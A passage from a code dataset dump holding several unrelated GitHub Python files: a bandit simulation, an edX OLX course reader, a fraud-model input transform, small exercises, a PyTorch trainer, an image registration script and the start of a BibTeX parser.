0):\n choice = reps.argmin(0)\n else:\n choice = (Q + c * np.sqrt(np.log(i + 1)/reps)).argmax(0)\n elif (np.random.uniform(0, 1) > e):\n choice = Q.argmax(0)\n else:\n choice = np.random.choice(k)\n optimalChoice = q.argmax(0)\n if (choice == optimalChoice):\n optimalChoices+= 1\n reps[choice] += 1\n reward = np.random.normal(q[choice], rewardNoise)\n if (alpha == 0):\n Q[choice] = Q[choice] + (reward-Q[choice])/reps[choice]\n else:\n Q[choice] = Q[choice] + alpha * (reward - Q[choice])\n rewards[i] = reward\n for y in range(k):\n q[y] += change * np.random.normal(0, 1)\n if(i != 0): \n optimality[i] = optimalChoices/i\n # print(rewards)\n return [rewards, optimalChoices, n, optimality]\n\n\nnn = 100\nnr = 1000\nvaluesLen = 10\nwinners = np.zeros(4)\nprocents = np.zeros(4)\nens = np.zeros(4)\nsums = np.zeros(4)\noptimalities1 = np.zeros(nr)\noptimalities2 = np.zeros(nr)\noptimalities3 = np.zeros(nr)\noptimalities4 = np.zeros(nr)\naverageRewards1 = np.zeros(nr)\naverageRewards2 = np.zeros(nr)\naverageRewards3 = np.zeros(nr)\naverageRewards4 = np.zeros(nr)\nfor p in range(nn):\n qv = np.random.normal(0, 1, valuesLen)\n # qv = [0.1, 0.11, 0.12, 0.13, 0.14, 0.09, 0.08, 0.07, 0.06, 0.05]\n r1 = bandit(qv, nr, alpha=0.3, e=0.01, change=0, rewardNoise=0)\n r2 = bandit(qv, nr, alpha=0, e=0.1, change=0, rewardNoise=0)\n r3 = bandit(qv, nr, alpha=0.1, e=0, change=0, rewardNoise=0)\n r4 = bandit(qv, nr, alpha=0.2, e=0, change=0, rewardNoise=0, isUcb=True)\n optimalities1 += r1[3]\n optimalities2 += r2[3]\n optimalities3 += r3[3]\n optimalities4 += r4[3]\n averageRewards1 += r1[0]/nn\n averageRewards2 += r2[0]/nn\n averageRewards3 += r3[0]/nn\n averageRewards4 += r4[0]/nn\n # print(averageRewards2)\n # print(r2[0])\n# print(averageRewards4)\n# print(optimalities1/nn)\n# print(optimalities4/nn)\n\n# print(averageRewards4)\n\n# plt.plot(optimalities1/nn, 'r')\n# plt.plot(optimalities2/nn, 'g')\n# plt.plot(optimalities3/nn, 'm')\n# plt.plot(optimalities4/nn, 'b')\n# plt.show()\n# print(averageRewards4)\nplt.plot(averageRewards1, 'r')\nplt.plot(averageRewards2, 'g')\nplt.plot(averageRewards3, 'm')\nplt.plot(averageRewards4, 'b')\nplt.show()","repo_name":"akmere/reinforcementLearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34802187034","text":"import logging\nimport os\n\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\n\nfrom app_cttoolv2.filesystem import get_configuration\nfrom app_cttoolv2.write_olx import write_vertical\n\nlogger = logging.getLogger()\n\n\nclass OLXReader:\n \"\"\"\n This class travels through whole input tar file and\n fetches course data and modifying the LTIs besides.\n \"\"\"\n def __init__(self):\n self.vds_cnt = 0\n self.lti_cnt = 0\n\n def traverse_workspace(self, path):\n \"\"\"\n Traverses the directory structure of the unpacked .tar.gz file.\n Inputs:\n path: Path to root of unpacked file.\n \"\"\"\n course_detail = {}\n course_metadata = {}\n course_outline = []\n\n base_path = str(path) + '/' + os.listdir(str(path))[0] + '/'\n course_tree = get_course_tree(path, len(base_path))\n\n if settings.COURSE_XML in course_tree.get('course'):\n file_full_path = os.path.join(base_path+'course/', settings.COURSE_XML)\n course_detail = parse_course_xml(file_full_path)\n if (\n 'course_url' in course_detail and\n course_detail['course_url'] + '.xml' in\n course_tree.get('course/course')\n ):\n file_full_path = os.path.join(\n base_path+'course/course',\n course_detail['course_url'] + '.xml'\n )\n course_metadata = parse_course_url_xml(file_full_path)\n if 'course/chapter' in course_tree:\n file_full_path = os.path.join(base_path+'course/')\n course_outline = self._traverse_course_content(file_full_path)\n\n logger.info('Total LTIs converted : %s', self.lti_cnt)\n logger.info('VDS LTIs converted : %s', self.vds_cnt)\n\n info_context = {\n 'lti_cnt': self.lti_cnt,\n 'vds_cnt': self.vds_cnt,\n 'course_name': course_metadata['display_name']\n }\n\n return {\n 'course_metadata': course_metadata,\n 'course_outline': course_outline,\n 'base_path': base_path,\n 'course_key_tags': course_detail,\n 'info_context': info_context\n }\n\n def _traverse_course_content(self, course_path):\n \"\"\"\n Traverses through course content(e.g. section, subsection and unit).\n Inputs:\n course_path: path to course directory.\n \"\"\"\n sequentials = os.listdir(str(course_path+'sequential'))\n sequential_list = []\n for sequential in sequentials:\n sequential_list.append(\n self.parse_sequential_xml(sequential, course_path)\n )\n return sequential_list\n\n def parse_sequential_xml(self, seq_name, course_path):\n \"\"\"\n Parse the .xml and extract vertical tags.\n Inputs:\n seq_name: name of sequential xml file.\n course_path: path to course directory.\n \"\"\"\n sequntial_path = course_path + 'sequential/' + seq_name\n with open(sequntial_path, 'r', encoding='utf-8') as seq_xml_file:\n data = seq_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n vertical_list = []\n seq_display_name = bs_data.find('sequential').get(\"display_name\")\n verticals = bs_data.find_all('vertical')\n for vertical in verticals:\n vertical_name = vertical.get('url_name') + '.xml'\n vertical_list.append(\n self.parse_vertical_xml(\n vertical_name,\n course_path\n )\n )\n return {\n \"seq_display_name\": seq_display_name,\n \"verticals\": vertical_list\n }\n\n def parse_vertical_xml(self, vertical_name, course_path):\n \"\"\"\n Parse the .xml and extract vertical tags.\n Inputs:\n vertical_name: name of vertical xml file.\n course_path: path to course directory.\n \"\"\"\n env_conf = get_configuration()\n\n vertical_path = course_path + 'vertical/' + vertical_name\n with open(vertical_path, 'r', encoding='utf-8') as vertical_xml_file:\n data = vertical_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n component_list = []\n\n vertical_display_name = bs_data.find('vertical').get(\"display_name\")\n vertical_visible_to_staff_only = bs_data.find('vertical').get(\"visible_to_staff_only\")\n\n conf = {\n 'launch_url': env_conf.get('launch_url'),\n 'tool_id': env_conf.get('tool_id')\n }\n\n lti_adv_dt = bs_data.find('lti_advantage_consumer')\n if lti_adv_dt:\n self.lti_cnt += 1\n lti_launch_url = lti_adv_dt.get('launch_url')\n\n if (\n lti_launch_url and 'SelfActivatingAssessmentLauncher'\n in lti_launch_url\n ):\n self.vds_cnt += 1\n conf['tool_id'] = env_conf.get('vds_tool_id')\n\n env_tag = next(\n (env for env in settings.ENV_LIST if env in lti_launch_url),\n False\n )\n if env_tag:\n lti_launch_url.replace(env_tag, settings.ENV_NAME.lower(), 1)\n\n conf['launch_url'] = lti_launch_url\n\n logger.info(\n 'VDS LTI converted, name: %s',\n lti_adv_dt.get('display_name')\n )\n\n conf['custom_parameters'] = lti_adv_dt.get('custom_parameters')\n conf['url_name'] = lti_adv_dt.get('url_name')\n conf['xblock-family'] = lti_adv_dt.get('xblock-family')\n conf['has_score'] = lti_adv_dt.get('has_score')\n conf['ask_to_send_username'] = lti_adv_dt.get(\n 'ask_to_send_username'\n )\n conf['ask_to_send_name'] = lti_adv_dt.get('ask_to_send_name')\n conf['ask_to_send_email'] = lti_adv_dt.get('ask_to_send_email')\n conf['display_name'] = lti_adv_dt.get('display_name')\n\n write_vertical(vertical_path, conf, vertical_display_name, vertical_visible_to_staff_only)\n\n for vertical in bs_data.children:\n tag_name = ''\n file_name = ''\n for v_child in vertical.findAll():\n tag_name = v_child.name\n file_name = v_child.get(\"url_name\")\n component_list.append(\n {\n \"ver_display_name\": vertical_display_name,\n \"tag_name\": tag_name,\n \"file_name\": file_name\n }\n )\n return component_list\n\n\ndef get_course_tree(path, base_path_len):\n \"\"\"\n Returns a dict of lists having directory(key) and list of file(value).\n Inputs:\n path: Path to root of unpacked file.\n base_path_len: length of base path.\n \"\"\"\n course_tree = {}\n # pylint: disable=unused-variable\n for root, dir_names, file_names in os.walk(str(path)):\n if file_names:\n course_tree[root[base_path_len:]] = file_names\n return course_tree\n\n\ndef parse_course_xml(course_xml):\n \"\"\"\n Parse the course.xml file and extract attributes.\n Inputs:\n course_xml: course_xml file.\n \"\"\"\n with open(course_xml, 'r', encoding='utf-8') as course_xml_file:\n data = course_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n\n course_tag = bs_data.find('course')\n course = course_tag.get('course')\n org = course_tag.get('org')\n url_name = course_tag.get('url_name')\n\n logger.info('course_tag_attributes: %s %s %s', course, org, url_name)\n return {\n 'course_run': course,\n 'course_org': org,\n 'course_url': url_name\n }\n\n\ndef parse_course_url_xml(course_url_path):\n \"\"\"\n Parse the .xml and extract course details like name.\n Inputs:\n course_url_path: Path to course url file.\n \"\"\"\n with open(course_url_path, 'r', encoding='utf-8') as course_url_file:\n data = course_url_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n\n course_tag = bs_data.find('course')\n display_name = course_tag.get('display_name')\n course_start = course_tag.get('start')\n course_conclude = course_tag.get('conclude')\n\n logger.info('course_name: %s', display_name)\n return {\n 'display_name': display_name,\n 'course_start': course_start,\n 'course_conclude': course_conclude\n }\n","repo_name":"dcadams/CTTool-v2","sub_path":"app_cttoolv2/read_olx.py","file_name":"read_olx.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2090824013","text":"import pickle5 as pickle\nimport json\nimport numpy as np\n\n#write function to transform the input data from user \ndef transform_text(text):\n text = text.upper()\n new_text = ''\n for i in text.split():\n new_text = new_text+i+'-'\n return new_text\n\n\n\ndef transform_input_data(raw_data, scalar):#list\n #input_data is dict type\n output_datas = {}\n for k in raw_data:\n value = raw_data[k]\n #category_value = transform_text(category_value)\n if 'Sender' in k:\n value = transform_text(value)\n transformed_value = value + 'sender'\n elif 'Bene' in k:\n value = transform_text(value)\n transformed_value = value + 'bene'\n elif k == 'USD_Amount':\n transformed_value = scalar.transform(np.array(value).reshape(1,-1))[0][0]\n else:\n transformed_value = transform_text(value).rstrip('-')\n output_datas[k] = transformed_value\n \n return output_datas #dict\n\n#write function to encode the data\n\n\n\n#user_data = transformed data result from transform_input_data\ndef encode_user_data(user_data,init_data):\n for k in user_data:\n if k == \"Sender_Country\":\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n else:\n init_data['other-sender']=1\n\n elif k == \"Bene_Country\":\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n else:\n init_data['other-bene'] = 1 \n\n else:\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n \n init_data['USD_amount'] = user_data[\"USD_Amount\"]\n encoded_data = init_data\n return encoded_data\n\n\n\n","repo_name":"cindydao95/Applied-MachineLearning-to-FinancialFraudTransaction-Detection","sub_path":"transform_prediction_data.py","file_name":"transform_prediction_data.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"9979687417","text":"# Exercício 4:\n# Escreva uma função em Python que receba uma matriz como entrada e verifique se a matriz é \n# simétrica. Uma matriz é simétrica se ela for igual à sua transposta.\n\ndef verifica_simetria(mat):\n\n linhas = len(mat)\n colunas = len(mat[0])\n\n if linhas != colunas:\n return False\n\n transposta = [[0 for _ in range(linhas)]for _ in range(colunas)]\n\n for i in range(linhas):\n for j in range(colunas):\n if mat[i][j] != mat[j][i]:\n return False\n \n return True\n\n\n# mat = [[x for x in range(5)]for x in range(5)]\nmat = [\n [1, 2, 3],\n [2, 4, 5],\n [3, 5, 6]\n]\n\nprint(verifica_simetria(mat))\n","repo_name":"welli7ngton/Python","sub_path":"Matrizes/exercicio11.py","file_name":"exercicio11.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"12828284438","text":"from django.urls import path, include\n\nfrom . import views\n\nimport sys\nsys.path.append('../')\nsys.path.append('../../')\n\nurlpatterns = [\n path('index/', views.index),\n path('article//', views.article_page ,name='article_page'),\n path('edit/', views.edit_page,name='edit_page'),\n path('edit/action/', views.edit_action,name='edit_action'),\n path('hello/', views.hello),\n]","repo_name":"duopa/CodeLearning","sub_path":"py-Django/myblog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71861230405","text":"\n\n#word = input(\"Enter Word:\")\nword = \"ababab\"\ncount = 0\n\ndef checkForWord( position, counter ):\n if word[position] == 'b'and word[position+1] == 'a' and word[position+2] == 'b' :\n counter += 1\n return checkForWord(position+2, counter)\n else:\n print(\"IN\")\n return position\n\nif (len(word)%3) == 0 and len(word) != 0 :\n print(\"Can be a word\")\n try:\n i=0\n for i in range(0, len(word)-2, 3):\n if word[i] == 'a'and word[i+1] == 'b' and word[i+2] == 'a' :\n print(\"aba\")\n i = checkForWord( i+2, count)\n else:\n print(\"not a word\")\n break\n except ValueError:\n print(\"ERROR\")\nelse:\n print(\"Definetly not a word\")\n\n","repo_name":"grichan/python-small-projects","sub_path":"recursionTest.py","file_name":"recursionTest.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36339799080","text":"#10%\ndef get10(price):\n tip = price * 0.10\n f_price = price + tip\n return (f_price)\n\n#15%\ndef get15(price):\n tip = price * 0.15\n f_price = price + tip\n return (f_price)\n\n#20%\ndef get20(price):\n tip = price * 0.20\n f_price = price + tip\n return (f_price)\n\n#daily sales exclude tips\ndaily_sales = 0\ndaily_tip = 0\n\n#main\nwhile True:\n price = float(input(\"Enter meal price: \"))\n while price == 0:\n print(\"Invalid price. \")\n price = float(input(\"Enter meal price: \"))\n\n print(\"Select tip amount: \\n 1. 10% (Okay) \\n 2. 15% (Good) \\n 3. 20% (Excellent) \\n 4. Skip (Broke) \\n 5. Custom \")\n tip_choice = float(input(\"Choice: \"))\n\n #improve this on exception\n if tip_choice == 1:\n print(\"Total price is \", get10(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 2:\n print(\"Total price is \", get15(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 3:\n print(\"Total price is \", get20(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 4:\n print(\"Total price is \", price, \"\\n\")\n daily_sales += price\n elif tip_choice == 5:\n cus_tip = float(input(\"Enter tip: \"))\n price += cus_tip\n print(\"Total price is \", price, \"\\n \")\n daily_sales += price\n else:\n continue\n\n c = input(\"Continue another payment? (y/n) \")\n if c == \"y\":\n continue\n else:\n print(\"Closed. \\n Summary of daily sales: \", daily_sales)\n quit()\n","repo_name":"swiyt/-stdio.h-","sub_path":"CardReader.py","file_name":"CardReader.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11920024834","text":"#\n# @lc app=leetcode id=349 lang=python3\n#\n# [349] Intersection of Two Arrays\n#\n\n# @lc code=start\nclass Solution:\n def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n ############### hashmap ##############\n # hashmap = {}\n # res = []\n # for num1 in nums1:\n # hashmap[num1] = hashmap[num1] + 1 if num1 in hashmap else 1\n # for num2 in nums2:\n # if num2 in hashmap and hashmap[num2] > 0:\n # res.append(num2)\n # hashmap[num2] = 0\n # return res\n \n ############# two pointers ##############\n nums1.sort()\n nums2.sort()\n res = set()\n \n p1,p2 = 0,0\n while p1 < len(nums1) and p2 < len(nums2):\n if nums1[p1] > nums2[p2]:\n p2 += 1\n elif nums1[p1] < nums2[p2]:\n p1 += 1\n else:\n res.add(nums1[p1])\n p1+=1; p2+=1\n return list(res)\n# @lc code=end\n\n","repo_name":"AllenJShi/LeetCode","sub_path":"349.intersection-of-two-arrays.py","file_name":"349.intersection-of-two-arrays.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18088079138","text":"import collections\nclass directed_graph:\n def __init__(self,vertex):\n self.vertex=vertex\n self.adjMatrix=[[0 for i in range(vertex)] for j in range(vertex)]\n\n def addEdge(self,v1,v2):\n self.adjMatrix[v1][v2]=1\n\n def removeedge(self,v1,v2):\n if self.containEdge(v1,v2)!=True:return\n self.adjMatrix[v1][v2]=0\n\n def containEdge(self,v1,v2):\n return self.adjMatrix[v1][v2]==1\n\n def printgraph(self):\n print(' ',end='')\n for i in range(self.vertex):\n print(i,end=' ')\n print()\n print()\n i=0\n for ele in self.adjMatrix:\n print(i,end=' ')\n print(ele)\n print()\n i+=1\n\n\n\n\n\ndef dfs_helper(start,adj,vertex,visited,st):\n visited[start]=True\n for i in range(vertex):\n if adj[start][i]==1 and visited[i]==False:\n dfs_helper(i,adj,vertex,visited,st)\n st.appendleft(start)\n return\n\ndef topology_sort_dfs(adj,vertex):\n st=collections.deque()\n visited=[False for i in range(vertex)]\n for i in range(vertex):\n if visited[i]==False:\n dfs_helper(i,adj,vertex,visited,st)\n return list(st)\n\n\n\n\n\n\ng=directed_graph(5)\ng.addEdge(0,2)\ng.addEdge(2,1)\ng.addEdge(1,0)\ng.addEdge(1,3)\ng.addEdge(4,3)\ntopo=topology_sort_dfs(g.adjMatrix,g.vertex)\nprint(topo)","repo_name":"Shubhamkumarjha1244/DSA_PYTHON","sub_path":"DSA-using_python/SDE graphs/topology_sort_direct_graph_dfs.py","file_name":"topology_sort_direct_graph_dfs.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39204199874","text":"from functools import partial\nfrom itertools import zip_longest\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import cho_factor, cho_solve\nfrom scipy.special import expit\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sympy import *\nimport task1 as t1\nimport task2 as t2\nimport task6 as t6\n\n\ndef get_name(method):\n return method.__name__.replace('_', ' ').capitalize()\n\n\ndef create_matrix(condition_number, n):\n r = sqrt(condition_number)\n A = np.random.randn(n, n)\n u, s, v = np.linalg.svd(A)\n h, l = np.max(s), np.min(s)\n\n def f(x):\n return h * (1 - ((r - 1) / r) / (h - l) * (h - x))\n\n new_s = f(s)\n new_A = (u * new_s) @ v.T\n new_A = new_A @ new_A.T\n\n return new_A\n\n\ndef number_of_iters(cond, n_vars, step_chooser=t1.dichotomy, n_checks=10):\n all_iters = 0\n for _ in range(n_checks):\n A = create_matrix(cond, n_vars)\n b = np.random.randn(n_vars)\n init_x = np.random.randn(n_vars)\n\n def func(*args):\n x = np.array(args)\n return x.dot(A).dot(x) - b.dot(x)\n\n _, iter_num = t2.gradient_descention(func, *init_x, eps=1e-3, max_iter_num=20,\n step_f=partial(t6.to_step_f, step_chooser))\n\n all_iters += iter_num\n return all_iters / n_checks\n\n\n\ndef draw_condition():\n n_vars = list(range(2, 6))\n condition_numbers = np.linspace(1, 10, 5)\n plt.figure()\n for n in n_vars:\n iter_numbers = [number_of_iters(cond, n) for cond in condition_numbers]\n plt.plot(condition_numbers, iter_numbers, label=f'n={n}')\n\n plt.xlabel('$\\mu$')\n plt.ylabel('$T(n, k)$')\n plt.legend()\n plt.show()\n","repo_name":"Good-Morning/optimizative_jabas","sub_path":"mo/hw1/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8438072674","text":"from drf_yasg.utils import swagger_auto_schema\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom apps.vehicle.models import Vehicle\nfrom apps.vehicle.serializers import VehicleSerializer, VehicleUpdateSerializer, VehicleReadSerializer\n\n\nclass VehicleViewSet(ViewSet):\n permission_classes = [IsAuthenticated]\n\n def list(self, request):\n queryset = Vehicle.objects.all()\n policemen_serialized = VehicleReadSerializer(queryset, many=True)\n return Response(policemen_serialized.data)\n\n @swagger_auto_schema(request_body=VehicleSerializer)\n def create(self, request):\n serializer = VehicleSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n vehicle = serializer.create(serializer.validated_data)\n vehicle_serialized = VehicleSerializer(vehicle)\n return Response(vehicle_serialized.data)\n\n def retrieve(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n vehicle_serialized = VehicleReadSerializer(vehicle)\n return Response(vehicle_serialized.data)\n\n @swagger_auto_schema(request_body=VehicleUpdateSerializer)\n def update(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n serializer = VehicleUpdateSerializer(vehicle, data=request.data)\n serializer.is_valid(raise_exception=True)\n vehicle_updated = serializer.update(vehicle, serializer.validated_data)\n vehicle_updated_serialized = VehicleSerializer(vehicle_updated)\n return Response(vehicle_updated_serialized.data)\n\n def destroy(self, request, plate=None):\n queryset = Vehicle.objects.all()\n vehicle = get_object_or_404(queryset, plate=plate)\n vehicle.delete()\n return Response({'response': 'the vehicle was deleted successfully'})","repo_name":"julianpulecio/infraction_app","sub_path":"apps/vehicle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73694889924","text":"import numpy as np\nimport SimpleITK as sitk\nimport os, math, sys\nimport ndreg2D\n\ndimension = 2\naffine = sitk.AffineTransform(dimension)\nidentityAffine = list(affine.GetParameters())\nidentityDirection = list(affine.GetMatrix())\nzeroOrigin = [0]*dimension\nzeroIndex = [0]*dimension\n\ndef main():\n target = sitk.ReadImage(sys.argv[1], sitk.sitkFloat32)\n template = sitk.ReadImage(sys.argv[2], sitk.sitkFloat32)\n translation = registrationTranslation(target, template, identityAffine, 0.4, 0.02, 0.0005)\n translation = registrationTranslation(target, template, translation, 0.35, 0.005, 0.0001)\n euler2d = registrationEuler2D(target, template, translation, 0.2, 0.02, 0.00005)\n euler2d = registrationEuler2D(target, template, euler2d, 0.06, 0.005, 0.000025)\n euler2d = registrationEuler2D(target, template, translation, 0.04, 0.002, 0.000025)\n outImg = ndreg2D.imgApplyAffine2D(template, euler2d, size=target.GetSize())\n sitk.WriteImage(outImg, sys.argv[3])\n mytransformfile = open(sys.argv[4], \"w\")\n for item in euler2d:\n mytransformfile.write(\"%s\\n\" % item)\n \n mytransformfile.close()\n return\n\ndef registrationTranslation(target, template, initialTransform, smoothingRadius, mylearningRate, myminStep):\n interpolator = sitk.sitkLinear\n transtransform = sitk.TranslationTransform(dimension)\n transtransform.SetOffset(initialTransform[4:6])\n registration = sitk.ImageRegistrationMethod()\n registration.SetInterpolator(interpolator)\n registration.SetInitialTransform(transtransform)\n numHistogramBins = 64\n registration.SetMetricAsMattesMutualInformation(numHistogramBins)\n iterations = 10000\n registration.SetOptimizerAsRegularStepGradientDescent(learningRate=mylearningRate,numberOfIterations=iterations,estimateLearningRate=registration.EachIteration,minStep=myminStep)\n registration.Execute(sitk.SmoothingRecursiveGaussian(target,smoothingRadius),sitk.SmoothingRecursiveGaussian(template,smoothingRadius) )\n translation = identityAffine[0:dimension**2] + list(transtransform.GetOffset())\n return translation\n\ndef registrationEuler2D(target, template, initialTransform, smoothingRadius, mylearningRate, myminStep):\n interpolator = sitk.sitkLinear\n transform = sitk.Euler2DTransform()\n transform.SetTranslation(initialTransform[4:6])\n transform.SetMatrix(initialTransform[0:4])\n registration = sitk.ImageRegistrationMethod()\n registration.SetInterpolator(interpolator)\n registration.SetInitialTransform(transform)\n numHistogramBins = 64\n registration.SetMetricAsMattesMutualInformation(numHistogramBins)\n iterations = 10000\n registration.SetOptimizerAsRegularStepGradientDescent(learningRate=mylearningRate,numberOfIterations=iterations,estimateLearningRate=registration.EachIteration,minStep=myminStep)\n registration.Execute(sitk.SmoothingRecursiveGaussian(target,smoothingRadius),sitk.SmoothingRecursiveGaussian(template,smoothingRadius) )\n euler2d = list(transform.GetMatrix()) + list(transform.GetTranslation())\n return euler2d\n\nif __name__==\"__main__\":\n main()\n\n","repo_name":"bingxinghuo/Connectivity_matrix","sub_path":"xregist/rigidFluoroToNissl.py","file_name":"rigidFluoroToNissl.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"38261661537","text":"import torch\nimport time\nimport os\nfrom tqdm import tqdm\n\nfrom utils.Confusion import ConfusionMatrix\n\n\nfrom opt import parse_opt\n\nopt = parse_opt()\n\n\nclass Trainer:\n def __init__(self, model, train_loader, test_loader, criterion, optimizer, lr_scheduler, early_stopping):\n self.model = model\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.criterion = criterion\n self.optimizer = optimizer\n self.lr_scheduler = lr_scheduler\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.model.to(self.device)\n self.early_stopping = early_stopping\n\n def train(self, num_epochs, model_path):\n start = time.time()\n model_path = model_path + '/best.pt'\n for epoch in range(num_epochs):\n self.model.train()\n running_loss = 0.0\n correct = 0\n total = 0\n total_step = len(self.train_loader)\n # 创建一个进度条,并设置总共的step数量\n loop = tqdm(enumerate(self.train_loader), total=len(self.train_loader))\n for i, (inputs, labels) in loop:\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n self.optimizer.zero_grad()\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs, labels)\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n running_acc = correct / total\n\n # 更新训练信息\n loop.set_description(f'Epoch [{epoch+1}/{num_epochs}]')\n loop.set_postfix(loss=loss.item(), acc=running_acc)\n\n train_loss = running_loss / total_step\n train_acc = correct / total\n\n test_loss, test_acc = self.test()\n\n self.lr_scheduler.step(test_acc)\n if opt.monitor == 'acc':\n self.early_stopping(test_acc, self.model, model_path)\n else:\n self.early_stopping(test_loss, self.model, model_path)\n\n print('Epoch [{}/{}], Train Loss: {:.4f}, Train Acc: {:.4f}, Test Loss: {:.4f}, Test Acc: {:.4f}'\n .format(epoch + 1, num_epochs, train_loss, train_acc, test_loss, test_acc))\n\n if self.early_stopping.early_stop:\n print(\"Early Stopping\")\n break\n end = time.time()\n print('train time cost: {:.5f}'.format(end-start))\n\n def test(self):\n self.model.eval()\n running_loss = 0.0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (inputs, labels) in enumerate(self.test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs, labels)\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n test_loss = running_loss / len(self.test_loader)\n test_acc = correct / total\n\n return test_loss, test_acc\n\n def test_confusion(self, path, initial_checkpoint):\n f = torch.load(initial_checkpoint)\n self.model.load_state_dict(f)\n\n # read class_indict\n labels = os.listdir(path)\n confusion = ConfusionMatrix(num_classes=opt.num_classes, labels=labels)\n\n start = time.time()\n self.model.eval()\n running_loss = 0.0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (inputs, labels) in enumerate(self.test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n\n outputs = self.model(inputs)\n\n loss = self.criterion(outputs, labels)\n\n running_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n confusion.update(predicted.cpu().numpy(), labels.cpu().numpy())\n end = time.time()\n confusion.plot()\n confusion.summary()\n print(\"test_confusion time cost: {:.5f} sec\".format(end - start))\n\n test_loss = running_loss / len(self.test_loader)\n test_acc = correct / total\n\n return test_loss, test_acc\n","repo_name":"PolarRegion/Bilinear_Dense","sub_path":"utils/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38175594960","text":"# Tuple liste ile aynı sadece atama sonrasında eleman üzerinde değişim yapılmıyor sadece toplu bir şekilde değişiyor\r\n\r\nlist = [1, 2, 3]\r\ntuple = (1, \"iki\", 3)\r\n\r\nlist = [\"ali\", \"veli\"]\r\ntuple = (\"damla\", \"ayşe\")\r\n\r\nprint(list)\r\nprint(tuple )","repo_name":"omerdagistanli/BTK_Akademi_Sifirdan_Ileri_Seviye_Python_Programlama","sub_path":"1-Python Objeleri ve Veri Yapıları/3.0-Tuple.py","file_name":"3.0-Tuple.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"30049312118","text":"# -*- coding: utf-8 -*-\n\n\nimport re\nimport collections\n\nfrom zotero_bibtize.bibkey_formatter import KeyFormatter\n\n\nclass BibEntry(object):\n def __init__(self, bibtex_entry_string, key_format=None, omit_fields=None):\n # check for fields not required\n self.fields_to_omit = []\n if omit_fields is not None:\n self.fields_to_omit = omit_fields.split(',')\n self._raw = bibtex_entry_string\n entry_type, entry_key, entry_fields = self.entry_fields(self._raw)\n # set internal variables\n self.type = entry_type\n if key_format is not None:\n key_formatter = KeyFormatter(entry_fields, entry_type=entry_type)\n self.key = key_formatter.generate_key(key_format)\n else:\n 